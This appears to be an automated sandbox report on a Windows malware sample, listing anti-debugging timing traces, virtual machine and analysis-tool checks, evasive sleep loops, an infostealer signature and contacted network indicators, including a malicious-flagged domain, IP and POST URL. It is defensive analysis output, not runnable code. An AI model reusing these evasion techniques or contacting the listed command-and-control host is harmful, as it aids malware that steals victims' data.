Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72507A5 second address: 72507C3 instructions: 0x00000000 rdtsc 0x00000002 movsx edi, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ch, C7h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F70F070E5D1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72507C3 second address: 725081C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F70F0BCDB17h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F70F0BCDB19h 0x0000000f adc ecx, 5D968A66h 0x00000015 jmp 00007F70F0BCDB11h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ax, bx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 725081C second address: 7250821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7240918 second address: 724091E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 724091E second address: 7240931 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F70F070E5CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7240931 second address: 724093F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 724093F second address: 7240943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7240943 second address: 7240949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7240949 second address: 7240964 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7240964 second address: 72409A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F70F0BCDB13h 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F70F0BCDB16h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F70F0BCDB0Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72409A4 second address: 72409AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72409AA second address: 7240A1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F70F0BCDB0Ah 0x0000000b or ch, FFFFFF98h 0x0000000e jmp 00007F70F0BCDB0Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F70F0BCDB0Bh 0x00000021 xor cl, 0000005Eh 0x00000024 jmp 00007F70F0BCDB19h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F70F0BCDB10h 0x00000030 and ch, 00000058h 0x00000033 jmp 00007F70F0BCDB0Bh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7240A1A second address: 7240A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7240A20 second address: 7240A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250AB8 second address: 7250AD0 instructions: 0x00000000 rdtsc 0x00000002 call 00007F70F070E5CBh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250AD0 second address: 7250AD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250AD6 second address: 7250B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 0DBD9375h 0x00000008 call 00007F70F070E5D2h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], ebp 0x00000014 pushad 0x00000015 call 00007F70F070E5D7h 0x0000001a pushfd 0x0000001b jmp 00007F70F070E5D8h 0x00000020 sbb eax, 1AC95A58h 0x00000026 jmp 00007F70F070E5CBh 0x0000002b popfd 0x0000002c pop eax 0x0000002d pushfd 0x0000002e jmp 00007F70F070E5D9h 0x00000033 or esi, 30C095F6h 0x00000039 jmp 00007F70F070E5D1h 0x0000003e popfd 0x0000003f popad 0x00000040 mov ebp, esp 0x00000042 jmp 00007F70F070E5CEh 0x00000047 push dword ptr [ebp+04h] 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F70F070E5D7h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250B9A second address: 7250BA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250BA0 second address: 7250BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250BA4 second address: 7250BA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0A32 second address: 72C0A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0A36 second address: 72C0A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0A3C second address: 72C0A88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F70F070E5CEh 0x00000012 jmp 00007F70F070E5D5h 0x00000017 popfd 0x00000018 call 00007F70F070E5D0h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0A88 second address: 72C0AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dl, byte ptr [ebp+14h] 0x00000009 jmp 00007F70F0BCDB17h 0x0000000e mov eax, dword ptr [ebp+10h] 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0AAF second address: 72C0B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F70F070E5D0h 0x0000000a add ax, 9508h 0x0000000f jmp 00007F70F070E5CBh 0x00000014 popfd 0x00000015 popad 0x00000016 pushfd 0x00000017 jmp 00007F70F070E5D8h 0x0000001c adc eax, 6AAE3768h 0x00000022 jmp 00007F70F070E5CBh 0x00000027 popfd 0x00000028 popad 0x00000029 and dl, 00000007h 0x0000002c pushad 0x0000002d mov edi, ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F70F070E5CEh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0B18 second address: 72C0B28 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0B28 second address: 72C0B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0B2C second address: 72C0B32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0B32 second address: 72C0B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0B42 second address: 72C0B8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F71607F31A5h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F70F0BCDB0Bh 0x0000001a xor si, 3D6Eh 0x0000001f jmp 00007F70F0BCDB19h 0x00000024 popfd 0x00000025 mov di, cx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0B8B second address: 72C0BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5D8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0BA7 second address: 72C0BCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, 00000000h 0x0000000d jmp 00007F70F0BCDB0Ch 0x00000012 inc ecx 0x00000013 pushad 0x00000014 mov dx, ax 0x00000017 popad 0x00000018 shr eax, 1 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0BCE second address: 72C0BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0BD2 second address: 72C0BD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0BD6 second address: 72C0BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0BDC second address: 72C0BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB16h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0BF6 second address: 72C0A32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7160333B99h 0x0000000d jne 00007F70F070E5BDh 0x0000000f inc ecx 0x00000010 shr eax, 1 0x00000012 jne 00007F70F070E5BDh 0x00000014 imul ecx, ecx, 03h 0x00000017 movzx eax, dl 0x0000001a cdq 0x0000001b sub ecx, 03h 0x0000001e call 00007F70F071EABDh 0x00000023 cmp cl, 00000040h 0x00000026 jnc 00007F70F070E5D7h 0x00000028 cmp cl, 00000020h 0x0000002b jnc 00007F70F070E5C8h 0x0000002d shld edx, eax, cl 0x00000030 shl eax, cl 0x00000032 ret 0x00000033 or edx, dword ptr [ebp+0Ch] 0x00000036 or eax, dword ptr [ebp+08h] 0x00000039 or edx, 80000000h 0x0000003f pop ebp 0x00000040 retn 0010h 0x00000043 push ebp 0x00000044 push 00000001h 0x00000046 push edx 0x00000047 push eax 0x00000048 call edi 0x0000004a mov edi, edi 0x0000004c jmp 00007F70F070E5D2h 0x00000051 xchg eax, ebp 0x00000052 jmp 00007F70F070E5D0h 0x00000057 push eax 0x00000058 jmp 00007F70F070E5CBh 0x0000005d xchg eax, ebp 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F70F070E5D0h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A0E34 second address: 72A0E46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A0E46 second address: 72A0E59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A0E59 second address: 72A0E5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: BDFAD8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D8DA07 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: BDF9B7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E17F16 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00719980 rdtsc 0_2_00719980
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 6804 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6804 Thread sleep time: -72036s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6968 Thread sleep count: 65 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6968 Thread sleep time: -130065s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5492 Thread sleep count: 65 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5492 Thread sleep time: -130065s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1308 Thread sleep count: 55 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1308 Thread sleep time: -110055s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2172 Thread sleep count: 56 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2172 Thread sleep time: -112056s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5496 Thread sleep count: 53 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5496 Thread sleep time: -106053s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6716 Thread sleep count: 59 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6716 Thread sleep time: -118059s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5632 Thread sleep count: 60 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5632 Thread sleep time: -120060s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0053255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses, 0_2_0053255D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, 0_2_005329FF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0053255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses, 0_2_0053255D
Source: file.exe, file.exe, 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: file.exe Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: file.exe, 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2629736059.00000000016FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2630078979.000000000170C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2630026091.00000000016FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2606683274.00000000016CA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073486658.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2629692014.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2632082566.000000000170D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07230A43 Start: 07230A27 End: 07230A22 0_2_07230A43
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07290486 Start: 07290582 End: 07290588 0_2_07290486
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00719980 rdtsc 0_2_00719980
Source: file.exe, file.exe, 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: procmon.exe
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: wireshark.exe

Stealing of Sensitive Information
barindex
Infostealer behavior detected
Source: Signature Results Signatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global traffic TCP traffic: 192.168.2.5:49705 -> 34.118.84.150:80
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
18.213.123.165
 httpbin.org United States
14618 AMAZON-AESUS false
34.118.84.150
 home.twentykx20pt.top United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG true

Contacted Domains

Name IP Active
home.twentykx20pt.top 34.118.84.150 true
httpbin.org 18.213.123.165 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477 true
  • Avira URL Cloud: safe
 unknown
https://httpbin.org/ip false
    		high